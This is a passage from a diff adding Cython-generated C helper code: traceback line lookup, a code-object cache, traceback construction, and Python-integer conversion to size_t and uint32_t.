&ptype, &pvalue, &ptraceback); +#if CYTHON_COMPILING_IN_CPYTHON + cython_runtime_dict = _PyObject_GetDictPtr(__pyx_cython_runtime); + if (likely(cython_runtime_dict)) { + __PYX_PY_DICT_LOOKUP_IF_MODIFIED( + use_cline, *cython_runtime_dict, + __Pyx_PyDict_GetItemStr(*cython_runtime_dict, __pyx_n_s_cline_in_traceback)) + } else +#endif + { + PyObject *use_cline_obj = __Pyx_PyObject_GetAttrStrNoError(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback); + if (use_cline_obj) { + use_cline = PyObject_Not(use_cline_obj) ? Py_False : Py_True; + Py_DECREF(use_cline_obj); + } else { + PyErr_Clear(); + use_cline = NULL; + } + } + if (!use_cline) { + c_line = 0; + (void) PyObject_SetAttr(__pyx_cython_runtime, __pyx_n_s_cline_in_traceback, Py_False); + } + else if (use_cline == Py_False || (use_cline != Py_True && PyObject_Not(use_cline) != 0)) { + c_line = 0; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + return c_line; +} +#endif + +/* CodeObjectCache */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __pyx_bisect_code_objects(__Pyx_CodeObjectCacheEntry* entries, int count, int code_line) { + int start = 0, mid = 0, end = count - 1; + if (end >= 0 && code_line > entries[end].code_line) { + return count; + } + while (start < end) { + mid = start + (end - start) / 2; + if (code_line < entries[mid].code_line) { + end = mid; + } else if (code_line > entries[mid].code_line) { + start = mid + 1; + } else { + return mid; + } + } + if (code_line <= entries[mid].code_line) { + return mid; + } else { + return mid + 1; + } +} +static PyCodeObject *__pyx_find_code_object(int code_line) { + PyCodeObject* code_object; + int pos; + if (unlikely(!code_line) || unlikely(!__pyx_code_cache.entries)) { + return NULL; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if (unlikely(pos >= __pyx_code_cache.count) || unlikely(__pyx_code_cache.entries[pos].code_line != code_line)) { + return NULL; + } + code_object = __pyx_code_cache.entries[pos].code_object; + Py_INCREF(code_object); + return code_object; +} +static void __pyx_insert_code_object(int code_line, PyCodeObject* code_object) { + int pos, i; + __Pyx_CodeObjectCacheEntry* entries = __pyx_code_cache.entries; + if (unlikely(!code_line)) { + return; + } + if (unlikely(!entries)) { + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Malloc(64*sizeof(__Pyx_CodeObjectCacheEntry)); + if (likely(entries)) { + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = 64; + __pyx_code_cache.count = 1; + entries[0].code_line = code_line; + entries[0].code_object = code_object; + Py_INCREF(code_object); + } + return; + } + pos = __pyx_bisect_code_objects(__pyx_code_cache.entries, __pyx_code_cache.count, code_line); + if ((pos < __pyx_code_cache.count) && unlikely(__pyx_code_cache.entries[pos].code_line == code_line)) { + PyCodeObject* tmp = entries[pos].code_object; + entries[pos].code_object = code_object; + Py_DECREF(tmp); + return; + } + if (__pyx_code_cache.count == __pyx_code_cache.max_count) { + int new_max = __pyx_code_cache.max_count + 64; + entries = (__Pyx_CodeObjectCacheEntry*)PyMem_Realloc( + __pyx_code_cache.entries, ((size_t)new_max) * sizeof(__Pyx_CodeObjectCacheEntry)); + if (unlikely(!entries)) { + return; + } + __pyx_code_cache.entries = entries; + __pyx_code_cache.max_count = new_max; + } + for (i=__pyx_code_cache.count; i>pos; i--) { + entries[i] = entries[i-1]; + } + entries[pos].code_line = code_line; + entries[pos].code_object = code_object; + __pyx_code_cache.count++; + Py_INCREF(code_object); +} +#endif + +/* AddTraceback */ +#include "compile.h" +#include "frameobject.h" +#include "traceback.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + if (c_line) { + (void) __pyx_cfilenm; + (void) __Pyx_CLineForTraceback(__Pyx_PyThreadState_Current, c_line); + } + _PyTraceback_Add(funcname, filename, py_line); +} +#else +static PyCodeObject* __Pyx_CreateCodeObjectForTraceback( + const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = NULL; + PyObject *py_funcname = NULL; + #if PY_MAJOR_VERSION < 3 + PyObject *py_srcfile = NULL; + py_srcfile = PyString_FromString(filename); + if (!py_srcfile) goto bad; + #endif + if (c_line) { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + #else + py_funcname = PyUnicode_FromFormat( "%s (%s:%d)", funcname, __pyx_cfilenm, c_line); + if (!py_funcname) goto bad; + funcname = PyUnicode_AsUTF8(py_funcname); + if (!funcname) goto bad; + #endif + } + else { + #if PY_MAJOR_VERSION < 3 + py_funcname = PyString_FromString(funcname); + if (!py_funcname) goto bad; + #endif + } + #if PY_MAJOR_VERSION < 3 + py_code = __Pyx_PyCode_New( + 0, + 0, + 0, + 0, + 0, + 0, + __pyx_empty_bytes, /*PyObject *code,*/ + __pyx_empty_tuple, /*PyObject *consts,*/ + __pyx_empty_tuple, /*PyObject *names,*/ + __pyx_empty_tuple, /*PyObject *varnames,*/ + __pyx_empty_tuple, /*PyObject *freevars,*/ + __pyx_empty_tuple, /*PyObject *cellvars,*/ + py_srcfile, /*PyObject *filename,*/ + py_funcname, /*PyObject *name,*/ + py_line, + __pyx_empty_bytes /*PyObject *lnotab*/ + ); + Py_DECREF(py_srcfile); + #else + py_code = PyCode_NewEmpty(filename, funcname, py_line); + #endif + Py_XDECREF(py_funcname); // XDECREF since it's only set on Py3 if cline + return py_code; +bad: + Py_XDECREF(py_funcname); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(py_srcfile); + #endif + return NULL; +} +static void __Pyx_AddTraceback(const char *funcname, int c_line, + int py_line, const char *filename) { + PyCodeObject *py_code = 0; + PyFrameObject *py_frame = 0; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject *ptype, *pvalue, *ptraceback; + if (c_line) { + c_line = __Pyx_CLineForTraceback(tstate, c_line); + } + py_code = __pyx_find_code_object(c_line ? -c_line : py_line); + if (!py_code) { + __Pyx_ErrFetchInState(tstate, &ptype, &pvalue, &ptraceback); + py_code = __Pyx_CreateCodeObjectForTraceback( + funcname, c_line, py_line, filename); + if (!py_code) { + /* If the code object creation fails, then we should clear the + fetched exception references and propagate the new exception */ + Py_XDECREF(ptype); + Py_XDECREF(pvalue); + Py_XDECREF(ptraceback); + goto bad; + } + __Pyx_ErrRestoreInState(tstate, ptype, pvalue, ptraceback); + __pyx_insert_code_object(c_line ? -c_line : py_line, py_code); + } + py_frame = PyFrame_New( + tstate, /*PyThreadState *tstate,*/ + py_code, /*PyCodeObject *code,*/ + __pyx_d, /*PyObject *globals,*/ + 0 /*PyObject *locals*/ + ); + if (!py_frame) goto bad; + __Pyx_PyFrame_SetLineNumber(py_frame, py_line); + PyTraceBack_Here(py_frame); +bad: + Py_XDECREF(py_code); + Py_XDECREF(py_frame); +} +#endif + +/* CIntFromPyVerify */ +#define __PYX_VERIFY_RETURN_INT(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 0) +#define __PYX_VERIFY_RETURN_INT_EXC(target_type, func_type, func_value)\ + __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, 1) +#define __PYX__VERIFY_RETURN_INT(target_type, func_type, func_value, exc)\ + {\ + func_type value = func_value;\ + if (sizeof(target_type) < sizeof(func_type)) {\ + if (unlikely(value != (func_type) (target_type) value)) {\ + func_type zero = 0;\ + if (exc && unlikely(value == (func_type)-1 && PyErr_Occurred()))\ + return (target_type) -1;\ + if (is_unsigned && unlikely(value < zero))\ + goto raise_neg_overflow;\ + else\ + goto raise_overflow;\ + }\ + }\ + return (target_type) value;\ + } + +/* CIntFromPy */ +static CYTHON_INLINE size_t __Pyx_PyInt_As_size_t(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const size_t neg_one = (size_t) -1, const_zero = (size_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(size_t) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(size_t, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (size_t) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(size_t, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(size_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 2 * PyLong_SHIFT)) { + return (size_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(size_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 3 * PyLong_SHIFT)) { + return (size_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(size_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 4 * PyLong_SHIFT)) { + return (size_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (size_t) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(size_t) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(size_t) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(size_t, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(size_t) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(size_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + return (size_t) ((((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(size_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + return (size_t) ((((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 4 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(size_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 4 * PyLong_SHIFT)) { + return (size_t) ((((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(size_t) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(size_t) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + size_t val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (size_t) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (size_t) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (size_t) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (size_t) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (size_t) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(size_t) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((size_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(size_t) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((size_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((size_t) 1) << (sizeof(size_t) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (size_t) -1; + } + } else { + size_t val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (size_t) -1; + val = __Pyx_PyInt_As_size_t(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to size_t"); + return (size_t) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to size_t"); + return (size_t) -1; +} + +/* CIntFromPy */ +static CYTHON_INLINE uint32_t __Pyx_PyInt_As_uint32_t(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const uint32_t neg_one = (uint32_t) -1, const_zero = (uint32_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(uint32_t) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(uint32_t, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (uint32_t) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(uint32_t, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(uint32_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) >= 2 * PyLong_SHIFT)) { + return (uint32_t) (((((uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(uint32_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) >= 3 * PyLong_SHIFT)) { + return (uint32_t) (((((((uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(uint32_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) >= 4 * PyLong_SHIFT)) { + return (uint32_t) (((((((((uint32_t)digits[3]) << PyLong_SHIFT) | (uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (uint32_t) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(uint32_t) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(uint32_t, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(uint32_t) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(uint32_t, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(uint32_t, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(uint32_t) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 2 * PyLong_SHIFT)) { + return (uint32_t) (((uint32_t)-1)*(((((uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(uint32_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 2 * PyLong_SHIFT)) { + return (uint32_t) ((((((uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(uint32_t) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 3 * PyLong_SHIFT)) { + return (uint32_t) (((uint32_t)-1)*(((((((uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(uint32_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 3 * PyLong_SHIFT)) { + return (uint32_t) ((((((((uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(uint32_t) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 4 * PyLong_SHIFT)) { + return (uint32_t) (((uint32_t)-1)*(((((((((uint32_t)digits[3]) << PyLong_SHIFT) | (uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(uint32_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 4 * PyLong_SHIFT)) { + return (uint32_t) ((((((((((uint32_t)digits[3]) << PyLong_SHIFT) | (uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(uint32_t) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(uint32_t, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(uint32_t) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(uint32_t, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + uint32_t val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (uint32_t) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (uint32_t) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (uint32_t) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (uint32_t) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (uint32_t) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for 